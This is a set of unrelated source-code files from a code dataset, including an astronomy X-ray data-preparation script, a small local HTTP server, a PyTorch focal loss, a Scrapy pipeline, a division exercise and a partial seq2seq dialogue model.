['fp_Poi_3_24_C','fp_bin_3_24_C','t_3_24_C','Bsrc_3_24_C','Snet_3_24_C',\n'Snet_3_24_C_lowERR','Snet_3_24_C_uppERR','Bsrc_3_8_C','Snet_3_8_C','Snet_3_8_C_lowERR',\n'Snet_3_8_C_uppERR','Bsrc_8_24_C','Snet_8_24_C','Snet_8_24_C_lowERR','Snet_8_24_C_uppERR',\n'fp_Poi_3_8_C','fp_Poi_8_24_C','fp_bin_3_8_C','fp_bin_8_24_C','f_3_24_C','f_3_8_C','f_8_24_C',\n'f_3_24_C_lowERR','f_3_24_C_uppERR','f_3_8_C_lowERR','f_3_8_C_uppERR',\n'f_8_24_C_lowERR','f_8_24_C_uppERR','L_10_40_C','t_3_8_C','t_8_24_C']\n\nb2.LUM_10TO40KEV_REST = np.log10(b2.LUM_10TO40KEV_REST)\nprimary.loc['B2_1204p34_s1',col_pri] = b2.values\n\n\n#3.\nser_lm = pd.read_csv(home+'/work_scripts/dwarf/data/ser_lowmass_final.csv')\nser_lm.set_index('NuID',inplace=True)\nser_lm.drop('Unnamed: 0',axis=1,inplace=True)\n#All deblended source counts from pri\n#Will confirm the source count properties from secondary\ncols = ['Fp','Fp_dblnd','Fp_poi','Fp_bin','Exp','BGD','SRC','ESRC','ESRCU',\n 'BGD_38','SRC_38','ESRC_38','ESRC_38U','BGD_824','SRC_824','ESRC_824','ESRC_824U',\n 'Fp_38','Fp_824','Fp_38b','Fp_824b','flux_324','flux_38','flux_824',\n 'eflux_324','eflux_324U','eflux_38','eflux_38U','eflux_824','eflux_824U',\n 'gamma_nus','l1040','EXP_3_8','EXP_8_24']\n \ncols_pri = ['Fp','Fp_dblnd','Exp','BGD','SRC','ESRC',\n 'BGD_38','SRC_38','ESRC_38','BGD_824','SRC_824','ESRC_824',\n 'Fp_38','Fp_824','flux_324','flux_38','flux_824',\n 'eflux_324','eflux_38','eflux_824','gamma_nus','l1040',\n 'EXP_3_8','EXP_8_24']\ncols_sec = ['Fp_poi','Fp_bin','Exp','BGD','SRC','ESRC','ESRCU',\n 'BGD_38','SRC_38','ESRC_38','ESRC_38U','BGD_824','SRC_824','ESRC_824','ESRC_824U',\n 'Fp_38','Fp_824','Fp_38b','Fp_824b','flux_324','flux_38','flux_824',\n 'eflux_324','eflux_324U','eflux_38','eflux_38U','eflux_824','eflux_824U',\n 'l1040','EXP_3_8','EXP_8_24']\n\ndf = pd.DataFrame(index=ser_lm.index,columns=cols)\nfor i in np.intersect1d(ser_lm.index,primary.index):\n df.loc[i,cols_pri] = primary.loc[i,col_pri].values\n\nfor i in np.intersect1d(ser_lm.index,secondary.index):\n df.loc[i,cols_sec] = secondary.loc[i,col_sec].values\n\nfrom astropy import coordinates as cd\ncat = cd.SkyCoord(ser_lm.RA_nustar,ser_lm.DEC_nustar,unit=(u.degree,u.degree))\nnames=[]\n\nfor i in cat.to_string('hmsdms'):\n ni = 'J'+i[0:2]+i[3:5]+i[15:18]+i[19:21]\n names.append(ni)\nnames[8] = 'J0653+7424'\nnames[10] = 'J1016-3329'\n\nser_lm['NAME'] = names\nser_lm = pd.concat((ser_lm,df),axis=1)\n\n#Use Fp_bin as Fp for secondary\nfor i in ser_lm[ser_lm.Fp.isnull()].index:\n if not ser_lm.loc[i,'Fp_bin'] == 0 :\n ser_lm.loc[i,'Fp'] = np.log10(ser_lm.loc[i,'Fp_bin'])\n else:\n ser_lm.loc[i,'Fp'] = np.log10(ser_lm.loc[i,'Fp_poi'])\n print(i,'use Poisson')\n\n#kcorrect mass\nser_lm['mass_kc'] = np.zeros(len(ser_lm),dtype=float)+np.nan\nser_lm.loc[['Nu_SDSSJ1034p6001_002','Nu_1ES0229p200_002',\n 'Nu_Mrk1210_003','Nu_IC751_002','Nu_NGC7212_001','Nu_WAS49b_003',\n 'SN2014C_s1','B2_1204p34_s1'],'mass_kc'] = \\\n [9.3805185,9.7898671,9.6437881,9.1315119,8.6367218,9.8377933,9.7227483,9.9330199]\n \n\n#BR_uerr \ndf_behr = ser_lm.loc[:,['SRC_824','SRC_38','BGD_824','BGD_38']].copy(deep=True)\ndf_behr.rename(columns={'SRC_824':'hardsrc','SRC_38':'softsrc','BGD_824':'hardbkg','BGD_38':'softbkg'},inplace=True)\ndf_behr['softarea'] = np.zeros(len(df_behr))+10.\ndf_behr['hardarea'] = np.zeros(len(df_behr))+10.\n#cols = ['BR','BR_LB','BR_UB','HR','HR_LB','HR_UB','logBR','logBR_LB','logBR_UB']\n#dfout=pd.DataFrame(index = df_behr.index,\n# columns = cols)\n\nfrom ctc_xray import *\n \ndfout = 
behrhug(df_behr,invertBR=True)\n\nser_lm = pd.concat((ser_lm,dfout),axis=1)\n\nser_lm['BR_uerr'] = ser_lm.BR_UB-ser_lm.BR\nser_lm['BR_lerr'] = ser_lm.BR-ser_lm.BR_LB\n\n#Useful columns\nc_nu = ['SRC_38','SRC_824','ESRC_824','BR']\nc_phot = ['SDSSu','SDSSuerr_m','SDSSg','SDSSgerr_m','SDSSr','SDSSrerr_m','SDSSi','SDSSierr_m','SDSSz','SDSSzerr_m',\n '2MASSJ','2MASSJerr','2MASSH','2MASSHerr','2MASSKs','2MASSKserr',\n 'W1','W1err','W2','W2err','W3','W3err','W4','W4err']\n\n#Caution on these objects\n#Nu_RGB_J2313p147_002 -- uncertain optical photometry (too faint)\n#Mrk1210_sA3 -- no HB detection, no 2MASS, no significant soft X-ray XMM & Chandra data even when merged ~40 ks data\n# -- also, optical/WISE counterpart identification is hard\n# -- Check position of spectrum taken.\n# don't use, no detection after deblending\n\n#\n#IC750 -- Soft X-ray detection, potentially very interesting? \n#SN2014C_001 -- bad NIR-MIR photometry identification, check\n#Manually coadded 4 chandra observations to create ~40ks exposure\n#thaw gamma, gamma = 0.89 \\pm 1\n#Chandra flux 3-8 keV = 1.42e-14 \n#chandra 2-10 keV lumin. = 1.162e42\n#chandra NH = 1e-20 \\pm 100 chi^2 = 1.66 \n#freeze gamma to 1.8, chi^2 = 2.49\n#NH = 1.46e22, flux = 9.99e-15, lumin = 8.57e41\n\n\n#IC2560_s2 : faint chandra obsid = 1592, out of fov in obsid = 4908\n#try XMM 1-10 keV: \n#PN - gamma = 1.78\\pm0.37, NH = 7.38e22 \\pm 2.44 e22, chisq = 0.8329 -- model more complicated?\n#3-8kev flux = 6.73e-14\n#2-10 kev luminosity = 1.29e43\n\n#NGC7212_s2 -- optical counterpart needs to reconfirm.\n#NGC7212 : no Chandra, XMM data quality is low\n#SDSS photometry does not satisfy S/N > 5, but I'm still using supercosmos anyway... \n#NH_GAL = 3.1e21\n#NH = 6.426e22 \\pm 3.73e22, gamma = 1.8 (freeze)\n#only 4 pha bins, reduced chisq = 1.57\n\n#Mkn6_s1 - checked XMM data, non-uniform rate-time plot\n#extracted spectrum, hard-band has high background and bad fit\n#reduced chisquare = 0.6489, not a good fit\n#NH = 0.14\\pm0.079 * 10^22 , Gamma = 1.89\\pm0.32, L210 = 42.573822756329662\n\n#SDSSJ1713p5728_s1 -- wrong SDSS photometric counterpart. \n\n\n#B2_1204p34_s1 -- XRT has very few counts, convert count rate to flux using PIMMS, \n#assuming galactic absorption and Gamma = 1.8, the flux between 0.5-7 keV is 3.8e-14\n#Note that the original NuSTAR catalog (2015) has a very different count rates for this object \n#suspicious? 
\n\n#ser_lm.drop('Nu_RGB_J2313p147_002',inplace=True)\n\nser_lm.drop('Nu_Mrk1210_003',inplace=True)\n#ser_lm.drop('Nu_SDSSJ1713p5729_002',inplace=True)\n#ser_lm.drop('Nu_Mrk1210_003',inplace=True)\n\n#SOFT X-RAY measurements\nser_lm['NH'] = np.zeros(len(ser_lm))+np.nan\nser_lm['l210'] = np.zeros(len(ser_lm))+np.nan\nser_lm['NHLErr'] = np.zeros(len(ser_lm))+np.nan\nser_lm['NHUErr'] = np.zeros(len(ser_lm))+np.nan\n\nser_lm.loc['Nu_1ES0229p200_002',['NH','l210','NHLErr','NHUErr']] = \\\n[23.11,42.25188,0.28,0.21]\nser_lm.loc['Nu_NGC1320_002',['NH','l210','NHLErr','NHUErr']] = \\\n[20.0,41.602059991327963,np.nan,np.nan]\nser_lm.loc['Nu_Mkn_6_001',['NH','l210','NHLErr','NHUErr']] = \\\n[21.24,42.63,1.56,0.36]\n#Mkn6 -- 3 XMM observations, one with Limited photon counts in the hard band\n#Use 2 XMM >20ks observations and 1 Chandra\n#XMM 6154 : L210 = 42.77, NH = 19.98+1.25-4.98\n#XMM 14423 : L210 = 42.40, NH = 21.19+0.23-0.36\n#Chandra : L210 = 42.63, NH = 20.03+1.59-1.79\nser_lm.loc['Nu_IC4329A_002', ['NH','l210','NHLErr','NHUErr']] = [np.nan,42.46,np.nan,np.nan]\n# Too few counts for spectral fitting, using 3XMM DR5 results\nser_lm.loc['Nu_SDSSJ1034p6001_002',['NH','l210','NHLErr','NHUErr']] = [20.96,43.064345657162171,np.nan,0.54]\n#ser_lm.loc['Nu_SDSSJ1713p5729_002',['NH','l210','NHErr']] = [np.nan,np.nan,np.nan] #faint XMM\nser_lm.loc['Nu_IC751_002',['NH','l210','NHLErr','NHUErr']] = \\\n[21.475296284157452,38.594392550375424,0.183,0.128] #might have maser\nser_lm.loc['Nu_NGC7212_001',['NH','l210','NHLErr','NHUErr']] = \\\n[np.nan,42.49,np.nan,np.nan]\nser_lm.loc['IC2560_s2',['NH','l210','NHLErr','NHUErr']] = \\\n[22.42,43.16,0.16,0.13]\nser_lm.loc['Nu_WAS49b_003',['NH','l210','NHLErr','NHUErr']] = \\\n[21.322219,42.62,np.nan,np.nan]\n\nser_lm.loc['SN2014C_s1',['NH','l210','NHLErr','NHUErr']] = \\\n[np.nan,41.591,np.nan,np.nan]\nser_lm.loc['B2_1204p34_s1',['NH','l210','NHLErr','NHUErr']] = [np.nan,42.65,np.nan,np.nan] #Swift/XRT\nser_lm.loc[['SN2014C_s1','Nu_NGC7212_001'],'mass_sed'] = ser_lm.loc[['SN2014C_s1','Nu_NGC7212_001'],'mass_kc'].values\nser_lm.loc[['SN2014C_s1','IC2560_s2','B2_1204p34_s1','Nu_IC751_002'],'l1040'] = \\\nnp.log10(np.asarray([5.88933e+42,2.49598e+43,1.39879e+43,6.7e39]))\n\n##Optical AGN or not?\n#needs to be sure : IC2560_s2\nser_lm['opt'] = [True for x in range(len(ser_lm))]\nser_lm.loc['Nu_IC4329A_002','opt'] = False \nser_lm.loc['Nu_Mkn_6_001','opt'] = False\nser_lm.loc['SN2014C_s1','opt'] = False\n\n\n\nr_star= pd.read_csv(home+'/work_scripts/dwarf/r_z.csv')\n\n\nsb70d=pd.read_csv(home+'/work_scripts/dwarf/sb70d.csv') \nsb70d.NH = np.log10(abs(sb70d.NH.values)) \nsb70d['ur'] = sb70d.umag-sb70d.rmag\nsb70d['gr'] = sb70d.gmag-sb70d.rmag\n\nser_lm['W2W3'] = ser_lm.W2-ser_lm.W3\nser_lm['W1W2'] = ser_lm.W1-ser_lm.W2\n\ncolors_lm = ['blue','green','orangered','saddlebrown','darkviolet','indianred',\n 'crimson','red','cyan','black','darkgrey']\n \nmrks = ['o','D','H','*','s','^','p','v','<','>','d']\nfillstyle = ['full' for x in range(len(ser_lm))]\n\nser_lm['color'] = colors_lm\nser_lm['mrk'] = mrks\nser_lm['fillstyle'] = fillstyle\nser_lm.loc[['Nu_IC4329A_002','Nu_Mkn_6_001','SN2014C_s1'],'fillstyle'] = 'none'\nser_lm['mrksize'] = [1, 0.8, 0.9, 1.2, 0.9, 1.,1.,1.,1.,0.95,0.95]\n\n#compute L10-40 for Nu_IC4329A_002 and Nu_Mkn_6_001 (not computed for some unknown reason)\nfrom chen_xray import *\nindex = 'Nu_IC4329A_002'\nz = ser_lm.loc[index,'z']\nl1040 = 4*np.pi*Distance(z=z).cgs.value**2*ser_lm.loc[index, 
'flux_824']*\\\nint_pl(10.,40.,primary.loc[index,'GAMMA_DBLND_USED'])/\\\nint_pl(8*(1+z),24*(1+z),primary.loc[index,'GAMMA_DBLND_USED'])\nl210 = 4*np.pi*Distance(z=z).cgs.value**2*8.120e-14*int_pl(2.,10.,1.8)/int_pl(0.2,12.,1.8)\nser_lm.loc[index,'l1040'] = 1*np.log10(l1040)\nser_lm.loc[index,'l210'] = np.log10(l210)\n\nindex = 'Nu_Mkn_6_001'\nz = ser_lm.loc[index,'z']\nl1040 = 4*np.pi*Distance(z=z).cgs.value**2*ser_lm.loc[index, 'flux_824']*\\\nint_pl(10.,40.,primary.loc[index,'GAMMA_DBLND_USED'])/\\\nint_pl(8*(1+z),24*(1+z),primary.loc[index,'GAMMA_DBLND_USED'])\nser_lm.loc[index,'l1040'] = 1*np.log10(l1040)\n\n#ser_lm.ESRC_824/ser_lm.SRC_824 > 0.5 \n#log FPROB_DBLND > -2 : 'Nu_IC751_002','Nu_NGC7212_001'\n#BINFPROB > 0.004 : 'SN2014C_s1'\n#set L1040 for these objects as upper limits\nser_lm.loc[:,'l1040'] = ser_lm.l1040.values.astype(float)\nser_lm.loc[['Nu_IC751_002','Nu_NGC7212_001','SN2014C_s1'],'l1040'] = ser_lm.loc[['Nu_IC751_002','Nu_NGC7212_001','SN2014C_s1'],'l1040'].values*-1\n\n#Sort by RA \nser_lm.sort('RA_nustar',inplace=True)\n\nser_lm['gr'] = ser_lm.gr_all.values\nser_lm.loc[ser_lm[ser_lm.SDSSr.notnull()].index.values,'gr'] = \\\nser_lm[ser_lm.SDSSr.notnull()].SDSSg.values - ser_lm[ser_lm.SDSSr.notnull()].SDSSr.values\n\nser_lm['l210n'] = ser_lm.flux_38*4*np.pi*Distance(z=ser_lm.z).cgs.value**2\n\nfor index,row in ser_lm.iterrows():\n ser_lm.loc[index,'l210n'] = np.log10(row.l210n*int_pl(2.,10.,1.8)/int_pl(3*(1+row.z),8*(1+row.z),1.8))\n#Write LATEX TABLE\n#Useful columns\nc_nu = ['Fp','SRC_38','ESRC_38','SRC_824','ESRC_824','BR','BR_lerr','BR_uerr',\n 'flux_38','eflux_38','flux_824','flux_324','eflux_824','eflux_324','Exp']\n \nc_phot = ['SDSSu','SDSSuerr_m','SDSSg','SDSSgerr_m','SDSSr','SDSSrerr_m','SDSSi','SDSSierr_m','SDSSz','SDSSzerr_m',\n '2MASSJ','2MASSJerr','2MASSH','2MASSHerr','2MASSKs','2MASSKserr',\n 'W1','W1err','W2','W2err','W3','W3err','W4','W4err']\nc_wise = ['W1','W1err','W2','W2err','W3','W3err','W4','W4err','W1W2','W2W3']\n\n\n#change .ix[0:6 to .ix[6:] for the rest \n\n\n#read for Mstar-MBH plots\npath=home+'/Dropbox/nustar_dwarf/otherdata/'\ncolspecs=[(1,5),(5,13),(13,21),(21,32),(32,40),(40,48),(48,56),(56,64),(64,69),(69,76),(76,84),(84,92),(92,100),(100,108),(108,116),(116,131),(131,140),(140,151),(151,163),(163,174),(174,190),(190,198),(198,208),(208,215),(215,225),(225,230),(230,234)]\nkh13_bulge=pd.read_fwf(path+'kh13_ar4-bulges.dat',colspecs=colspecs)\nkh13_bulge.drop('1',axis=1,inplace=True)\nkh13_bulge.drop(41,inplace=True)\nkh13_bulge.loc[:,'logMBH']=np.log10(kh13_bulge.loc[:,'logMBH'].values)\ncolspecs=[(4,14),(14,20),(20,33),(33,41),(41,50),(50,60),(60,68),(68,78),(78,90),(90,100),(100,111),(111,118),(118,128),(128,145),(145,154),(154,165)]\nkh13_e=pd.read_fwf(path+'kh13_ar4-ellipticals.dat',colspecs=colspecs)\nkh13_e.loc[:,'M_BH']=np.log10(kh13_e.loc[:,'M_BH'].values)\nkh13_e.rename(columns={'M_BH':'logMBH'},inplace=True)\n#load Reins & Volonteri 2015's Mgalaxy-Mbh relation\nrv15 = ascii.read(path+'reines15_blagn.txt').to_pandas()\nrv15.rename(columns={'logM*':'logmass'},inplace=True)\n\nb08 = pd.read_csv(path+'barth2008.csv')\ngh = pd.read_csv(path+'greene_ho_2007.csv')\ndgh=pd.read_csv(home+'/work_scripts/dwarf/Dong12_GH07.csv')\ndgh.rename(columns={'N_H':'NH','logM':'logmbh','logLHa':'lha'},inplace=True)\ndgh.loc[dgh[dgh.z.isnull()].index.values,'z'] = \\\n[0.0489,0.0722,0.0416,0.0726,0.0644,0.0606,0.0662,0.0732,0.0710,0.0715,0.0710,0.0614,0.0552,0.0444,0.0562,\n0.0684,0.0655,0.0570,0.0433,0.0755]\n\n\n'''\nchecking nustar L210 and soft 
X-ray L210 \nsns.regplot(ser_lm.l210,ser_lm.l210n,fit_reg = False)\nplt.plot(np.linspace(39.,44,10),np.linspace(39.,44.,10))\nplt.xlim(37.,44.)\nplt.ylim(37.,44)\n'''\n","sub_path":"plots/plot_new_dataprepare.py","file_name":"plot_new_dataprepare.py","file_ext":"py","file_size_in_byte":15227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"528991127","text":"__author__ = 'Michel'\n\n#import SimpleHTTPServer\nimport SocketServer\nimport threading\nimport atexit\nfrom BlocklyPropHTTPRequestHandler import BlocklyPropHTTPRequestHandler\n\nPORT = 6009\n\n\nclass BlocklyPropServer:\n def __init__(self):\n handler = BlocklyPropHTTPRequestHandler\n self.httpd = SocketServer.TCPServer((\"\", PORT), handler)\n\n self.server_thread = threading.Thread(target=start_server, args=(\"Server-Thread\", self.httpd))\n self.server_thread.start()\n\n #atexit.register(self.stop)\n\n def stop(self):\n self.httpd.shutdown()\n\n\n\ndef start_server(thread_name, server):\n server.serve_forever()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"462609587","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nfrom .utils import weight_reduce_loss\r\nimport pdb\r\n\r\n\r\n# This method is only for debugging\r\ndef py_sigmoid_focal_loss(pred,\r\n target,\r\n weight=None,\r\n gamma=2.0,\r\n alpha=0.25,\r\n reduction='mean',\r\n avg_factor=None):\r\n # pred_sigmoid = _sigmoid(pred)\r\n pred_sigmoid = pred.sigmoid()\r\n # pos_loss = (-1) * alpha * ((1 - pred_sigmoid)**gamma) * target * torch.log(pred_sigmoid)\r\n # neg_loss = (-1) * (1 - alpha) * (pred_sigmoid**gamma) * (1 - target) * torch.log(1 - pred_sigmoid)\r\n # loss = (pos_loss.sum() + neg_loss.sum()) * weight / avg_factor\r\n pt = (1 - pred_sigmoid) * target + pred_sigmoid * (1 - target)\r\n focal_weight = (alpha * target + (1 - alpha) *\r\n (1 - target)) * pt.pow(gamma)\r\n #\r\n loss = F.binary_cross_entropy_with_logits(\r\n pred, target, reduction='none') * focal_weight\r\n loss = weight_reduce_loss(loss, weight, reduction, avg_factor)\r\n return loss\r\n\r\n\r\nclass FocalLoss(nn.Module):\r\n\r\n def __init__(self,\r\n use_sigmoid=True,\r\n gamma=2.0,\r\n alpha=0.25,\r\n reduction='mean',\r\n loss_weight=1.0):\r\n super(FocalLoss, self).__init__()\r\n assert use_sigmoid is True, 'Only sigmoid focal loss supported now.'\r\n self.use_sigmoid = use_sigmoid\r\n self.gamma = gamma\r\n self.alpha = alpha\r\n self.reduction = reduction\r\n self.loss_weight = loss_weight\r\n\r\n def forward(self,\r\n pred,\r\n target,\r\n weight=None,\r\n avg_factor=None,\r\n reduction_override=None):\r\n assert reduction_override in (None, 'none', 'mean', 'sum')\r\n reduction = (\r\n reduction_override if reduction_override else self.reduction)\r\n if self.use_sigmoid:\r\n loss_cls = self.loss_weight * py_sigmoid_focal_loss(\r\n pred,\r\n target,\r\n weight,\r\n gamma=self.gamma,\r\n alpha=self.alpha,\r\n reduction=reduction,\r\n avg_factor=avg_factor)\r\n else:\r\n raise NotImplementedError\r\n return loss_cls\r\n","sub_path":"models/losses/focal_loss.py","file_name":"focal_loss.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"554630014","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the 
ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport os\nimport json\nfrom oldsinanews.config import BASE_PATH, RESULT_PATH\nfrom scrapy.exceptions import DropItem\nimport dateutil.parser as dparser\n\n\nclass OldsinanewsPipeline(object):\n    def process_item(self, item, spider):\n        if item['news_id']:\n            datetime_file_path = os.path.join(RESULT_PATH, item['news_time'])\n            if not os.path.exists(datetime_file_path):\n                os.mkdir(datetime_file_path)\n            with open('%s/%s.html' % (datetime_file_path, item['news_id']), 'wb') as f:\n                f.write(item['news_html'])\n            datetime_json_file_path = os.path.join(datetime_file_path, 'json_result')\n            if not os.path.exists(datetime_json_file_path):\n                os.mkdir(datetime_json_file_path)\n            json_result = {'news_id': item['news_id'], 'news_type': item['news_type'],\n                           'news_title': item['news_title'],\n                           'news_url': item['news_url'], 'news_time': item['news_time'],\n                           'news_content': item['news_content']}\n            with open('%s/%s.json' % (datetime_json_file_path, item['news_id']), 'w', encoding='utf8') as f:\n                f.write(json.dumps(json_result, sort_keys=True, indent=4, ensure_ascii=False))\n        else:\n            raise DropItem(\"Missing news_id in %s\" % item)\n\n","sub_path":"oldsinanews/oldsinanews/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"125762045","text":"\"\"\"\r\n1. Implement a function that takes two numbers (positional arguments) and performs their division.\r\nRequest the numbers from the user and handle the division-by-zero case.\r\n\"\"\"\r\n\r\n\r\ndef quotient(divisible, divisor):\r\n    \"\"\"\r\n    The quotient() function divides the numbers entered by the user.\r\n    divisible - the dividend\r\n    divisor - the divisor\r\n    On division by zero, a text error message is printed\r\n    \"\"\"\r\n    try:\r\n        result = divisible / divisor\r\n    except ZeroDivisionError:\r\n        result = \"Error: division by 0\"\r\n    except ValueError:\r\n        result = \"Input error: ValueError\"\r\n    finally:\r\n        return print(result)\r\n\r\narg_1 = float(input(\"Enter the dividend:\\n\"))\r\narg_2 = float(input(\"Enter the divisor:\\n\"))\r\n\r\nquotient(arg_1, arg_2)\r\n\r\n","sub_path":"3.1.py","file_name":"3.1.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"122296380","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport os\nimport time\nimport sys\nfrom tensorflow.python.ops import variable_scope\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nfrom . import decoder_fn_lib\nimport numpy as np\nimport re\nfrom . 
import utils\nfrom .utils import sample_gaussian, gaussian_kld, norm_log_liklihood, get_bow, get_rnn_encode, get_bi_rnn_encode, get_idf\n\nimport tensorboardX as tb\nimport tensorboardX.summary\nimport tensorboardX.writer\n\nfrom .cvae import BaseTFModel\n\nclass S2Smemory(BaseTFModel):\n '''\n Sequence-to-sequence baseline with attention for persona generation dataset, with/without\n pfofiles.\n When using profiles, we will use attention memory together with the input\n '''\n def __init__(self, config, api, log_dir, scope=None):\n super(S2Smemory, self).__init__()\n self.use_profile = config.use_profile\n self.vocab = api.vocab\n self.rev_vocab = api.rev_vocab\n self.vocab_size = len(self.vocab)\n\n self.scope = scope\n self.max_utt_len = config.max_utt_len\n self.go_id = self.rev_vocab[\"<s>\"]\n self.eos_id = self.rev_vocab[\"</s>\"]\n self.context_cell_size = config.cxt_cell_size\n self.sent_cell_size = config.sent_cell_size\n self.dec_cell_size = config.dec_cell_size\n\n self.embed_size = config.embed_size\n self.sent_type = config.sent_type\n self.keep_prob = config.keep_prob\n self.num_layer = config.num_layer\n self.dec_keep_prob = config.dec_keep_prob\n self.full_kl_step = config.full_kl_step\n self.grad_clip = config.grad_clip\n self.grad_noise = config.grad_noise\n\n # self.embedding = nn.Embedding(self.vocab_size, self.embed_size, padding_idx=0)\n # # self.idxembedding = nn.Embedding(self.vocab_size, 1)\n # #\n # # self.embedding.weight.require_grad = False\n # # self.idxembedding.weight.require_grad = False\n self.embedding = nn.Embedding.from_pretrained(torch.from_numpy(np.array(api.word2vec, dtype='float32')))\n self.idxembedding = nn.Embedding.from_pretrained(torch.from_numpy(np.array(api.word2idx, dtype='float32')).unsqueeze(1))\n\n # no dropout at last layer, we need to add one\n if self.sent_type == \"bow\":\n input_embedding_size = output_embedding_size = self.embed_size\n elif self.sent_type == \"rnn\":\n self.sent_cell = self.get_rnncell(\"gru\", self.embed_size, self.sent_cell_size, self.keep_prob, 1)\n input_embedding_size = output_embedding_size = self.sent_cell_size\n elif self.sent_type == \"bi_rnn\":\n self.bi_sent_cell = self.get_rnncell(\"gru\", self.embed_size, self.sent_cell_size, keep_prob=1.0, num_layer=1, bidirectional=True)\n input_embedding_size = output_embedding_size = self.sent_cell_size * 2\n\n # embedding + 1/0 identify encoding\n joint_embedding_size = input_embedding_size + 2\n\n self.enc_cell = self.get_rnncell(config.cell_type, joint_embedding_size, self.context_cell_size, keep_prob=1.0, num_layer=config.num_layer)\n cond_embedding_size = config.topic_embed_size + self.context_cell_size\n\n dec_inputs_size = cond_embedding_size\n\n # Decoder\n if config.num_layer > 1:\n self.dec_init_state_net = nn.ModuleList(\n [nn.Linear(dec_inputs_size, self.dec_cell_size) for i in range(config.num_layer)])\n else:\n self.dec_init_state_net = nn.Sequential(nn.Linear(dec_inputs_size, self.dec_cell_size), nn.Tanh())\n\n # decoder\n dec_input_embedding_size = self.embed_size if not self.use_profile else self.embed_size + input_embedding_size\n\n self.dec_cell = self.get_rnncell(config.cell_type, dec_input_embedding_size, self.dec_cell_size,\n config.keep_prob, config.num_layer)\n self.dec_cell_proj = nn.Linear(self.dec_cell_size, self.vocab_size)\n self.atten_proj = nn.Linear(input_embedding_size, self.dec_cell_size)\n\n self.build_optimizer(config, log_dir)\n\n # initilize learning rate\n self.learning_rate = config.init_lr\n with tf.name_scope(\"io\"):\n # 
all dialog context and known attributes\n self.input_contexts = tf.placeholder(dtype=tf.int32, shape=(None, None, self.max_utt_len), name=\"dialog_context\")\n self.context_lens = tf.placeholder(dtype=tf.int32, shape=(None,), name=\"context_lens\")\n self.profile_lens = tf.placeholder(dtype=tf.int32, shape=(None,), name=\"profile_lens\")\n #self.my_profile = tf.placeholder(dtype=tf.float32, shape=(None, 4), name=\"my_profile\")\n #self.ot_profile = tf.placeholder(dtype=tf.float32, shape=(None, 4), name=\"ot_profile\")\n\n # target response given the dialog context\n self.output_tokens = tf.placeholder(dtype=tf.int32, shape=(None, None), name=\"output_token\")\n self.output_lens = tf.placeholder(dtype=tf.int32, shape=(None,), name=\"output_lens\")\n\n # optimization related variables\n self.global_t = tf.placeholder(dtype=tf.int32, name=\"global_t\")\n self.use_prior = tf.placeholder(dtype=tf.bool, name=\"use_prior\")\n\n def forward(self, feed_dict, use_profile=False, mode='train'):\n for k, v in feed_dict.items():\n setattr(self, k, v)\n\n max_dialog_len = self.input_contexts.size(1)\n if use_profile:\n max_profile_len = self.profile_contexts.size(1)\n\n with variable_scope.variable_scope(\"wordEmbedding\"):\n self.input_contexts = self.input_contexts.view(-1, self.max_utt_len)\n input_embedding = self.embedding(self.input_contexts)\n if use_profile:\n profile_mask = (self.profile_contexts.sum(-1) != 0).float()\n self.profile_contexts = self.profile_contexts.view(-1, self.max_utt_len)\n profile_embedding = self.embedding(self.profile_contexts)\n\n if self.sent_type == \"bow\":\n input_embedding, sent_size = get_bow(input_embedding)\n if use_profile:\n profile_embedding, p_sent_size = get_bow(profile_embedding)\n\n elif self.sent_type == \"rnn\":\n input_embedding, sent_size = get_rnn_encode(input_embedding, self.sent_cell, self.keep_prob,\n scope=\"sent_rnn\")\n if use_profile:\n profile_embedding, p_sent_size = get_rnn_encode(profile_embedding, self.sent_cell,\n self.keep_prob, scope=\"sent_rnn\")\n elif self.sent_type == \"bi_rnn\":\n input_embedding, sent_size = get_bi_rnn_encode(input_embedding, self.bi_sent_cell,\n scope=\"sent_bi_rnn\")\n if use_profile:\n profile_embedding, p_sent_size = get_bi_rnn_encode(profile_embedding, self.bi_sent_cell,\n scope=\"sent_bi_rnn\")\n else:\n raise ValueError(\"Unknown sent_type. 
Must be one of [bow, rnn, bi_rnn]\")\n\n # reshape input into dialogs\n input_embedding = input_embedding.view(-1, max_dialog_len, sent_size)\n if use_profile:\n profile_embedding = profile_embedding.view(-1, max_profile_len, p_sent_size)\n if self.keep_prob < 1.0:\n input_embedding = F.dropout(input_embedding, 1 - self.keep_prob, self.training)\n\n # convert floors into 1 hot\n floor_one_hot = self.floors.new_zeros((self.floors.numel(), 2), dtype=torch.float)\n floor_one_hot.data.scatter_(1, self.floors.view(-1, 1), 1)\n floor_one_hot = floor_one_hot.view(-1, max_dialog_len, 2)\n joint_embedding_input = torch.cat([input_embedding, floor_one_hot], 2)\n\n # self.input_contexts = self.input_contexts.view(-1, self.max_utt_len)\n # input_embedding = self.embedding(self.input_contexts)\n # if self.sent_type == \"bow\":\n # input_embedding, sent_size = get_bow(input_embedding)\n # elif self.sent_type == \"rnn\":\n # input_embedding, sent_size = get_rnn_encode(input_embedding, self.sent_cell, self.keep_prob, scope=\"sent_rnn\")\n # elif self.sent_type == \"bi_rnn\":\n # input_embedding, sent_size = get_bi_rnn_encode(input_embedding, self.bi_sent_cell, scope=\"sent_bi_rnn\")\n # else:\n # raise ValueError(\"Unknown sent_type. Must be one of [bow, rnn, bi_rnn]\")\n # # reshape input into dialogs\n # input_embedding = input_embedding.view(-1, max_dialog_len, sent_size)\n # if use_profile:\n # profile_mask = 